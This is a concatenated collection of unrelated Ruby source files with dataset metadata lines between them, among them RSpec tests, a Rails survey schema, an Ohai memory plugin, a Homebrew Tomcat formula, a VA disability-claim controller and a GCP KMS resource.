@tutorial = Appium::Tutorial.new tutorial_root: tutorial_root
@first_module_gen = tutorial.modules.map { |m| m.modules_gen_path }.first
end
it 'detects tutorials with language' do
actual = tutorial.tutorials
expected = [ 'en' ]
expect(actual).to eq(expected)
end
it 'populates a module with correct paths' do
modules = tutorial.modules
module_path = join tutorial_root, 'en'
actual = modules.map { |m| m.module_root }.first
expected = module_path
expect(actual).to eq(expected)
actual = modules.map { |m| m.modules_gen_path }.first
expected = join(module_path, 'gen')
expect(actual).to eq(expected)
actual = modules.map { |m| m.modules_source_path }.first
expected = join(module_path, 'source')
expect(actual).to eq(expected)
end
it 'generates html' do
delete_gen
tutorial.generate_markdown
tutorial.generate_html
expect_gen_exists true
expect_markdown_exists true
expect_html_exists true
end
it 'generates markdown' do
delete_gen
tutorial.generate_markdown
expect_gen_exists true
expect_markdown_exists true
expect_html_exists false
end
it 'deletes the generated folder' do
mkdir_p first_module_gen unless exist? first_module_gen
expect_gen_exists true
tutorial.delete_gen
expect_gen_exists false
end
it 'lists contents' do
list = tutorial.list_contents
expected_modules = 1 * 2 # name/list per module
expect(list.length).to eq(expected_modules)
first_module_name = list.first
expect(first_module_name).to eq(":: /en\n")
first_module_contents = list[1]
expect(first_module_contents.length).to be >= 20
end
it 'publishes to the tutorial path' do
delete_tutorial_path
tutorial.publish
expect_tutorial_path_exists true
delete_tutorial_path
end
end | 24.396694 | 77 | 0.719173 |
262a56bfe5a64c2d4efd51ddb40248186f054e81 | 708 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Course::LevelNotifier, type: :notifier do
let!(:instance) { Instance.default }
with_tenant(:instance) do
describe '#level_reached' do
let(:course) { create(:course) }
let(:level) { create(:course_level, course: course) }
let(:user) { create(:course_user, course: course).user }
subject { Course::LevelNotifier.level_reached(user, level) }
it 'sends a course notification' do
expect { subject }.to change(course.notifications, :count).by(1)
end
it 'sends a user notification' do
expect { subject }.to change(user.notifications, :count).by(1)
end
end
end
end
| 28.32 | 72 | 0.663842 |
62237a7d5978be7e546830a6f40aa9697c66689c | 1,973 | #
# Author:: Patrick Collins (<[email protected]>)
# Copyright:: Copyright (c) 2013 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
Ohai.plugin(:Memory) do
provides 'memory'
collect_data(:darwin) do
memory Mash.new
installed_memory = shell_out("sysctl -n hw.memsize").stdout.to_i / 1024 / 1024.0
memory[:total] = "#{installed_memory.to_i}MB"
total_consumed = 0
active = 0
inactive = 0
vm_stat = shell_out("vm_stat").stdout
vm_stat_match = /page size of (\d+) bytes/.match(vm_stat)
page_size = if vm_stat_match and vm_stat_match[1]
vm_stat_match[1].to_i
else
4096
end
vm_stat.split("\n").each do |line|
['wired down', 'active', 'inactive'].each do |match|
unless line.index("Pages #{match}:").nil?
pages = line.split.last.to_i
megabyte_val = (pages * page_size) / 1024 / 1024.0
total_consumed += megabyte_val
case match
when 'wired down'
active += megabyte_val.to_i
when 'active'
active += megabyte_val.to_i
when 'inactive'
inactive += megabyte_val.to_i
end
end
end
end
memory[:active] = "#{active}MB" if active > 0
memory[:inactive] = "#{inactive}MB" if inactive > 0
free_memory = installed_memory - total_consumed
memory[:free] = "#{free_memory.to_i}MB" if total_consumed > 0
end
end
| 30.828125 | 84 | 0.651799 |
1aaae40a682766f7a259807d4e45b7853b7922cf | 6,728 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20190509224768) do
create_table "answers", force: :cascade do |t|
t.integer "question_id"
t.text "text"
t.text "short_text"
t.text "help_text"
t.integer "weight"
t.string "response_class"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.integer "display_order"
t.boolean "is_exclusive"
t.integer "display_length"
t.string "custom_class"
t.string "custom_renderer"
t.datetime "created_at"
t.datetime "updated_at"
t.string "default_value"
t.string "api_id"
t.string "display_type"
t.string "input_mask"
t.string "input_mask_placeholder"
end
add_index "answers", ["api_id"], name: "uq_answers_api_id", unique: true
create_table "dependencies", force: :cascade do |t|
t.integer "question_id"
t.integer "question_group_id"
t.string "rule"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "dependency_conditions", force: :cascade do |t|
t.integer "dependency_id"
t.string "rule_key"
t.integer "question_id"
t.string "operator"
t.integer "answer_id"
t.datetime "datetime_value"
t.integer "integer_value"
t.float "float_value"
t.string "unit"
t.text "text_value"
t.string "string_value"
t.string "response_other"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "question_groups", force: :cascade do |t|
t.text "text"
t.text "help_text"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.string "display_type"
t.string "custom_class"
t.string "custom_renderer"
t.datetime "created_at"
t.datetime "updated_at"
t.string "api_id"
end
add_index "question_groups", ["api_id"], name: "uq_question_groups_api_id", unique: true
create_table "questions", force: :cascade do |t|
t.integer "survey_section_id"
t.integer "question_group_id"
t.text "text"
t.text "short_text"
t.text "help_text"
t.string "pick"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.integer "display_order"
t.string "display_type"
t.boolean "is_mandatory"
t.integer "display_width"
t.string "custom_class"
t.string "custom_renderer"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "correct_answer_id"
t.string "api_id"
end
add_index "questions", ["api_id"], name: "uq_questions_api_id", unique: true
create_table "response_sets", force: :cascade do |t|
t.integer "user_id"
t.integer "survey_id"
t.string "access_code"
t.datetime "started_at"
t.datetime "completed_at"
t.datetime "created_at"
t.datetime "updated_at"
t.string "api_id"
end
add_index "response_sets", ["access_code"], name: "response_sets_ac_idx", unique: true
add_index "response_sets", ["api_id"], name: "uq_response_sets_api_id", unique: true
create_table "responses", force: :cascade do |t|
t.integer "response_set_id"
t.integer "question_id"
t.integer "answer_id"
t.datetime "datetime_value"
t.integer "integer_value"
t.float "float_value"
t.string "unit"
t.text "text_value"
t.string "string_value"
t.string "response_other"
t.string "response_group"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "survey_section_id"
t.string "api_id"
end
add_index "responses", ["api_id"], name: "uq_responses_api_id", unique: true
add_index "responses", ["survey_section_id"], name: "index_responses_on_survey_section_id"
create_table "survey_sections", force: :cascade do |t|
t.integer "survey_id"
t.string "title"
t.text "description"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.integer "display_order"
t.string "custom_class"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "survey_translations", force: :cascade do |t|
t.integer "survey_id"
t.string "locale"
t.text "translation"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "surveys", force: :cascade do |t|
t.string "title"
t.text "description"
t.string "access_code"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.datetime "active_at"
t.datetime "inactive_at"
t.string "css_url"
t.string "custom_class"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "display_order"
t.string "api_id"
t.integer "survey_version", default: 0
end
add_index "surveys", ["access_code", "survey_version"], name: "surveys_access_code_version_idx", unique: true
add_index "surveys", ["api_id"], name: "uq_surveys_api_id", unique: true
create_table "validation_conditions", force: :cascade do |t|
t.integer "validation_id"
t.string "rule_key"
t.string "operator"
t.integer "question_id"
t.integer "answer_id"
t.datetime "datetime_value"
t.integer "integer_value"
t.float "float_value"
t.string "unit"
t.text "text_value"
t.string "string_value"
t.string "response_other"
t.string "regexp"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "validations", force: :cascade do |t|
t.integer "answer_id"
t.string "rule"
t.string "message"
t.datetime "created_at"
t.datetime "updated_at"
end
end
| 31.148148 | 111 | 0.676873 |
4ab93975d3d5e85791c39e6e33ac74dbc66c0b53 | 3,743 | # frozen_string_literal: true
module V0
class DisabilityCompensationFormsController < ApplicationController
before_action { authorize :evss, :access? }
before_action :validate_name_part, only: [:suggested_conditions]
def rated_disabilities
response = service.get_rated_disabilities
render json: response,
serializer: RatedDisabilitiesSerializer
end
def suggested_conditions
results = DisabilityContention.suggested(params[:name_part])
render json: results, each_serializer: DisabilityContentionSerializer
end
# Submission path for `form526 increase only`
# TODO: This is getting deprecated in favor of `form526 all claims` (defined below)
# and can eventually be removed completely
def submit
form_content = JSON.parse(request.body.string)
saved_claim = SavedClaim::DisabilityCompensation::Form526IncreaseOnly.from_hash(form_content)
saved_claim.save ? log_success(saved_claim) : log_failure(saved_claim)
submission = create_submission(saved_claim)
jid = submission.start(EVSS::DisabilityCompensationForm::SubmitForm526IncreaseOnly)
render json: { data: { attributes: { job_id: jid } } },
status: :ok
end
def submit_all_claim
form_content = JSON.parse(request.body.string)
saved_claim = SavedClaim::DisabilityCompensation::Form526AllClaim.from_hash(form_content)
saved_claim.save ? log_success(saved_claim) : log_failure(saved_claim)
submission = create_submission(saved_claim)
jid = submission.start(EVSS::DisabilityCompensationForm::SubmitForm526AllClaim)
render json: { data: { attributes: { job_id: jid } } },
status: :ok
end
def submission_status
job_status = Form526JobStatus.where(job_id: params[:job_id]).first
raise Common::Exceptions::RecordNotFound, params[:job_id] unless job_status
render json: job_status, serializer: Form526JobStatusSerializer
end
def rating_info
rating_info_service = EVSS::CommonService.new(auth_headers)
response = rating_info_service.get_rating_info
render json: response,
serializer: RatingInfoSerializer
end
private
def create_submission(saved_claim)
Rails.logger.info(
'Creating 526 submission', user_uuid: @current_user&.uuid, saved_claim_id: saved_claim&.id
)
Form526Submission.create(
user_uuid: @current_user.uuid,
saved_claim_id: saved_claim.id,
auth_headers_json: auth_headers.to_json,
form_json: saved_claim.to_submission_data(@current_user)
)
rescue PG::NotNullViolation => e
Rails.logger.error(
'Creating 526 submission: PG::NotNullViolation', user_uuid: @current_user&.uuid, saved_claim_id: saved_claim&.id
)
raise e
end
def log_failure(claim)
StatsD.increment("#{stats_key}.failure")
raise Common::Exceptions::ValidationErrors, claim
end
def log_success(claim)
StatsD.increment("#{stats_key}.success")
Rails.logger.info "ClaimID=#{claim.confirmation_number} Form=#{claim.class::FORM}"
end
def translate_form4142(form_content)
EVSS::DisabilityCompensationForm::Form4142.new(@current_user, form_content).translate
end
def validate_name_part
raise Common::Exceptions::ParameterMissing, 'name_part' if params[:name_part].blank?
end
def service
EVSS::DisabilityCompensationForm::Service.new(auth_headers)
end
def auth_headers
EVSS::DisabilityCompensationAuthHeaders.new(@current_user).add_headers(EVSS::AuthHeaders.new(@current_user).to_h)
end
def stats_key
'api.disability_compensation'
end
end
end
| 34.33945 | 120 | 0.717606 |
2675f03917bf79932898420f96c0bcb3e3eba372 | 153 | actions :run
default_action :run
attribute :node_ip, :kind_of => String, :name_attribute => true
attribute :port, :kind_of => Integer, :default => 27017 | 30.6 | 63 | 0.738562 |
f8c9900104332ce8f3228c5cbadbc0ee3ed914b3 | 4,071 | # This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
config.disable_monkey_patching!
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 46.261364 | 129 | 0.749693 |
1d50450c26f3928b43f1e914d975588afd37639f | 2,316 | require 'rails_helper'
RSpec.describe CandidateInterface::GcseEnicForm do
describe 'validations' do
let(:form) { subject }
let(:qualification_data) do
{
enic_reference: '12345',
comparable_uk_qualification: 'GCSE (grades A*-C / 9-4)',
}
end
it { is_expected.to validate_presence_of(:have_enic_reference) }
context 'validates enic_reference if they have chosen that they have one' do
before { allow(form).to receive(:chose_to_provide_enic_reference?).and_return(true) }
it { is_expected.to validate_presence_of(:enic_reference) }
end
context 'validates comparable_uk_qualification if they have chosen to provide a ENIC reference' do
before { allow(form).to receive(:chose_to_provide_enic_reference?).and_return(true) }
it { is_expected.to validate_presence_of(:comparable_uk_qualification) }
end
describe '#build_from_qualification' do
it 'creates an object based on the provided ApplicationQualification' do
qualification = ApplicationQualification.new(qualification_data)
enic_form = CandidateInterface::GcseEnicForm.build_from_qualification(
qualification,
)
expect(enic_form.have_enic_reference).to eq 'Yes'
expect(enic_form.enic_reference).to eq qualification.enic_reference
expect(enic_form.comparable_uk_qualification).to eq qualification.comparable_uk_qualification
end
end
describe '#save' do
let(:form_data) do
{
have_enic_reference: 'Yes',
enic_reference: '12345',
comparable_uk_qualification: 'GCSE (grades A*-C / 9-4)',
}
end
it 'returns false if not valid' do
enic_form = CandidateInterface::GcseEnicForm.new
expect(enic_form.save(ApplicationQualification.new)).to eq(false)
end
it 'updates the provided ApplicationQualification if valid' do
qualification = build(:gcse_qualification)
enic_form = CandidateInterface::GcseEnicForm.new(form_data)
expect(enic_form.save(qualification)).to eq(true)
expect(qualification.enic_reference).to eq form_data[:enic_reference]
expect(qualification.comparable_uk_qualification).to eq form_data[:comparable_uk_qualification]
end
end
end
end
| 34.567164 | 103 | 0.708117 |
ace37466bc4a027fb6bf206389c1d3f2ff833cb3 | 9,381 | # encoding: UTF-8
require 'spec_helper'
describe CloudModel::ItemIssue do
it { expect(subject).to have_timestamps }
it { expect(subject).to have_field(:title).of_type String }
it { expect(subject).to have_field(:message).of_type String }
it { expect(subject).to have_field(:key).of_type String }
it { expect(subject).to have_field(:value) }
it { expect(subject).to have_enum(:severity).with_values(
0x00 => :info,
0x01 => :task,
0x10 => :warning,
0xf0 => :critical,
0xff => :fatal
).with_default_value_of(:info) }
it { expect(subject).to have_field(:resolved_at).of_type Time }
it { expect(subject).to belong_to(:subject).with_polymorphism.with_optional }
it { expect(subject).to have_field(:subject_chain_ids).of_type(Array).with_default_value_of [] }
describe '#open' do
it 'should filter for open items' do
scoped = double
filtered = double
expect(subject.class).to receive(:scoped).and_return scoped
expect(scoped).to receive(:where).with(resolved_at: nil).and_return filtered
expect(subject.class.open).to eq filtered
end
end
describe '#resolved' do
it 'should filter for resolved items' do
scoped = double
filtered = double
expect(subject.class).to receive(:scoped).and_return scoped
expect(scoped).to receive(:where).with(resolved_at: {"$ne" => nil}).and_return filtered
expect(subject.class.resolved).to eq filtered
end
end
describe 'name' do
it 'should return title' do
subject.title = "Some Title"
expect(subject.name).to eq "Some Title"
end
end
describe 'resolved?' do
it 'should be true if resolved_at is set' do
subject.resolved_at = Time.now
expect(subject.resolved?).to eq true
end
it 'should be false if resolved_at is not set' do
expect(subject.resolved?).to eq false
end
end
describe 'subject_chain=' do
it 'should set subject_chain_ids' do
guest = Factory :guest
subject.subject_chain=[guest.host, guest]
expect(subject.subject_chain_ids).to eq [
{:id=>guest.host_id, :type=>"CloudModel::Host"},
{:id=>guest.id, :type=>"CloudModel::Guest"}
]
end
end
describe 'subject_chain' do
it 'should get subject_chains from subject_chain_ids' do
guest = Factory :guest
subject.subject_chain_ids=[
{:id=>guest.host_id, :type=>"CloudModel::Host"},
{:id=>guest.id, :type=>"CloudModel::Guest"}
]
expect(subject.subject_chain).to eq [guest.host, guest]
end
end
describe 'set_subject_chain' do
it 'should set subject chain item item_issue_chain' do
item = Factory :guest
subject.subject = item
subject.set_subject_chain
expect(subject.subject_chain).to eq [item.host, item]
end
it 'should set subject chain to the subject in an array if item has no item_issue_chain' do
item = Factory :guest
allow(item).to receive(:'respond_to?').with(:item_issue_chain, false).and_return false
subject.subject = item
subject.set_subject_chain
expect(subject.subject_chain).to eq [item]
end
it 'should not tamper subject chain if no subject was set' do
subject.set_subject_chain
expect(subject.subject_chain_ids).to eq []
end
it 'should be called before save' do
expect(subject).to receive(:set_subject_chain)
subject.run_callbacks :save
end
end
describe 'notify' do
it 'should should invoke configured notifiers' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
subject.title = "Issue Test"
subject.message = "Just an Issue"
expect(notifier).to receive(:send_message).with('[INFO] Issue Test', 'Just an Issue')
subject.notify
end
it 'should should invoke configured notifiers and mention set subject' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
subject.title = "Issue Test"
subject.message = "Just an Issue on some subject"
allow(subject).to receive(:subject).and_return 'Some::Subject'
expect(notifier).to receive(:send_message).with('[INFO] Some::Subject: Issue Test', 'Just an Issue on some subject')
subject.notify
end
it 'should should include item issue url if configured in message' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
allow(CloudModel.config).to receive(:issue_url).and_return 'https://cloud.cloud-model.org/issues/%id%'
subject.title = "Issue Test"
subject.message = "Just an Issue on some subject"
allow(subject).to receive(:subject).and_return 'Some::Subject'
expect(notifier).to receive(:send_message).with('[INFO] Some::Subject: Issue Test', "Just an Issue on some subject\n<https://cloud.cloud-model.org/issues/#{subject.id}>")
subject.notify
end
it 'should should include isubject chain if given in message' do
notifier = double
guest = Factory :guest
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
subject.title = "Issue Test"
subject.message = "Just an Issue on some subject"
subject.subject_chain_ids=[
{:id=>guest.host_id, :type=>"CloudModel::Host"},
{:id=>guest.id, :type=>"CloudModel::Guest"}
]
allow(subject).to receive(:subject).and_return 'Some::Subject'
expect(notifier).to receive(:send_message).with('[INFO] Some::Subject: Issue Test', "Hardware Host '#{guest.host.name}', Guest System '#{guest.name}'\n\nJust an Issue on some subject")
subject.notify
end
it 'should should not invoke configured notifiers if severity is not met' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
subject.title = "Issue Test"
subject.severity = :task
expect(notifier).not_to receive(:send_message)
subject.notify
end
it 'should should not invoke configured notifiers if severity is not set on notifier config' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{notifier: notifier}]
subject.title = "Issue Test"
subject.severity = :task
expect(notifier).not_to receive(:send_message)
subject.notify
end
it 'should be triggered after create' do
expect(subject).to receive(:notify)
subject.run_callbacks :create
end
end
describe 'subject' do
it 'should find services through it´s guest' do
services = double
service = double
guest = double CloudModel::Guest, services: services
subject.subject_type = CloudModel::Services::Nginx
subject.subject_id = BSON::ObjectId.new
expect(CloudModel::Guest).to receive(:find_by).with('services'=>{'$elemMatch' =>{'_id'=>subject.subject_id}}).and_return guest
expect(services).to receive(:find).with(subject.subject_id).and_return service
expect(subject.subject).to eq service
end
it 'should find services through it´s guest and fallback to nil if not found' do
subject.subject_type = CloudModel::Services::Nginx
subject.subject_id = BSON::ObjectId.new
expect(subject.subject).to eq nil
end
it 'should find lxd_volumes through it´s guest' do
volumes = double
volume = double
guest = double CloudModel::Guest, lxd_custom_volumes: volumes
subject.subject_type = CloudModel::LxdCustomVolume
subject.subject_id = BSON::ObjectId.new
expect(CloudModel::Guest).to receive(:find_by).with('lxd_custom_volumes'=>{'$elemMatch' =>{'_id'=>subject.subject_id}}).and_return guest
expect(volumes).to receive(:find).with(subject.subject_id).and_return volume
expect(subject.subject).to eq volume
end
it 'should find lxd_volumes through it´s guest and fallback to nil if not found' do
subject.subject_type = CloudModel::LxdCustomVolume
subject.subject_id = BSON::ObjectId.new
expect(subject.subject).to eq nil
end
it 'should use super subject for other items' do
host = CloudModel::Host.new
subject.subject = host
expect(subject.subject).to eq host
end
it 'should be nil if no subject is set' do
expect(subject.subject).to eq nil
end
end
describe 'title' do
it 'should return set title if present' do
subject.title = "Some Title"
expect(subject.title).to eq "Some Title"
end
it 'should use I18n version of title for key if no title is set, but a key' do
subject.key = :something
expect(subject.title).to eq "translation missing: en.issues.something"
end
it 'should use I18n version of title for subject key if no title is set, but a key and subject' do
subject.key = :something
subject.subject = CloudModel::Host.new
expect(subject.title).to eq "translation missing: en.issues.cloud_model/host.something"
end
it 'should be blank if not key or title is set' do
expect(subject.title).to eq nil
end
end
end | 33.503571 | 190 | 0.683296 |
ab9ac5f9669b8138197895d53dec9f9ae983485f | 556 | class UserMailer < ApplicationMailer
# Subject can be set in your I18n file at config/locales/en.yml
# with the following lookup:
#
# en.user_mailer. account_activation.subject
#
def account_activation(user)
@user = user
mail to: user.email, subject: "Account activation"
end
# Subject can be set in your I18n file at config/locales/en.yml
# with the following lookup:
#
# en.user_mailer.password_reset.subject
#
def password_reset(user)
@user = user
mail to: user.email, subject: "Password Reset"
end
end
| 24.173913 | 65 | 0.703237 |
5d4a6062e66ae41e8312e629cafc897e5acda44c | 2,339 | # frozen_string_literal: false
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
require 'gcp_backend'
require 'google/kms/property/cryptokey_version_template'
# A provider to manage Cloud Key Management Service resources.
class KMSCryptoKey < GcpResourceBase
name 'google_kms_crypto_key'
desc 'CryptoKey'
supports platform: 'gcp'
attr_reader :params
attr_reader :crypto_key_name
attr_reader :create_time
attr_reader :labels
attr_reader :purpose
attr_reader :rotation_period
attr_reader :version_template
attr_reader :next_rotation_time
attr_reader :key_ring
def initialize(params)
super(params.merge({ use_http_transport: true }))
@params = params
@fetched = @connection.fetch(product_url(params[:beta]), resource_base_url, params, 'Get')
parse unless @fetched.nil?
end
def parse
@crypto_key_name = name_from_self_link(@fetched['name'])
@create_time = parse_time_string(@fetched['createTime'])
@labels = @fetched['labels']
@purpose = @fetched['purpose']
@rotation_period = @fetched['rotationPeriod']
@version_template = GoogleInSpec::KMS::Property::CryptoKeyVersionTemplate.new(@fetched['versionTemplate'], to_s)
@next_rotation_time = parse_time_string(@fetched['nextRotationTime'])
@key_ring = @fetched['keyRing']
end
# Handles parsing RFC3339 time string
def parse_time_string(time_string)
time_string ? Time.parse(time_string) : nil
end
def exists?
[email protected]?
end
def to_s
"CryptoKey #{@params[:name]}"
end
def primary_state
@fetched['primary']['state']
end
private
def product_url(_ = nil)
'https://cloudkms.googleapis.com/v1/'
end
def resource_base_url
'projects/{{project}}/locations/{{location}}/keyRings/{{key_ring_name}}/cryptoKeys/{{name}}'
end
end
| 29.2375 | 116 | 0.64643 |
2660d281fcf83eb169afd979550cba36c780bd91 | 218 | str = "Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics."
splited_str = str.split(/\s|,\s*|;\s*|\.\s*/)
splited_str.each do |word|
# puts word
puts word.size
end
| 21.8 | 102 | 0.674312 |
4a8a74904d23a5aa198871e5aa40535e8007ab65 | 2,124 | class Tomcat < Formula
desc "Implementation of Java Servlet and JavaServer Pages"
homepage "https://tomcat.apache.org/"
stable do
url "https://www.apache.org/dyn/closer.cgi?path=tomcat/tomcat-8/v8.0.30/bin/apache-tomcat-8.0.30.tar.gz"
mirror "https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.30/bin/apache-tomcat-8.0.30.tar.gz"
sha256 "2fc3dde305e08388a12bd2868063ab6829a1d70acd9affe3a8707bd9679e0059"
depends_on :java => "1.7+"
resource "fulldocs" do
url "https://www.apache.org/dyn/closer.cgi?path=/tomcat/tomcat-8/v8.0.30/bin/apache-tomcat-8.0.30-fulldocs.tar.gz"
mirror "https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.30/bin/apache-tomcat-8.0.30-fulldocs.tar.gz"
version "8.0.30"
sha256 "c5f3966606a72223db519c1c2045bf7d34ab297dce2bc54187da355a251d0c07"
end
end
devel do
url "https://www.apache.org/dyn/closer.cgi?path=/tomcat/tomcat-9/v9.0.0.M3/bin/apache-tomcat-9.0.0.M3.tar.gz"
version "9.0.0.M3"
sha256 "edde79fdd49649ffc2ce6b8c7a6b665b45a450629b60e78f436f3528570e9104"
depends_on :java => "1.8+"
resource "fulldocs" do
url "https://www.apache.org/dyn/closer.cgi?path=/tomcat/tomcat-9/v9.0.0.M3/bin/apache-tomcat-9.0.0.M3-fulldocs.tar.gz"
version "9.0.0.M3"
sha256 "c430d0044823857099601d82afe0f15e715859dc17402f9ce7083d0647f63e9b"
end
end
bottle :unneeded
option "with-fulldocs", "Install full documentation locally"
def install
# Remove Windows scripts
rm_rf Dir["bin/*.bat"]
# Install files
prefix.install %w[ NOTICE LICENSE RELEASE-NOTES RUNNING.txt ]
libexec.install Dir["*"]
bin.install_symlink "#{libexec}/bin/catalina.sh" => "catalina"
(share/"fulldocs").install resource("fulldocs") if build.with? "fulldocs"
end
test do
ENV["CATALINA_BASE"] = testpath
cp_r Dir["#{libexec}/*"], testpath
rm Dir["#{libexec}/logs/*"]
pid = fork do
exec bin/"catalina", "start"
end
sleep 3
begin
system bin/"catalina", "stop"
ensure
Process.wait pid
end
File.exist? testpath/"logs/catalina.out"
end
end
| 31.701493 | 124 | 0.693503 |
79cad68118741258a41a2270602e598fcb4e81e9 | 1,869 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "Dark_Library/version"
Gem::Specification.new do |spec|
spec.name = "Dark_Library"
spec.version = DarkLibrary::VERSION
spec.authors = ["Ilovaiskyi Valery"]
spec.email = ["[email protected]"]
spec.summary = %q{TODO: Write a short summary, because RubyGems requires one.}
spec.description = %q{TODO: Write a longer description or delete this line.}
spec.homepage = "TODO: Put your gem's website or public repo URL here."
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.17"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "minitest", "~> 5.0"
end
| 43.465116 | 96 | 0.678438 |
f85d3ade364af77713db64d335d9eebb17f94303 | 398 | module Mongoid
module Token
module Finders
def self.define_custom_token_finder_for(klass, field_name = :token)
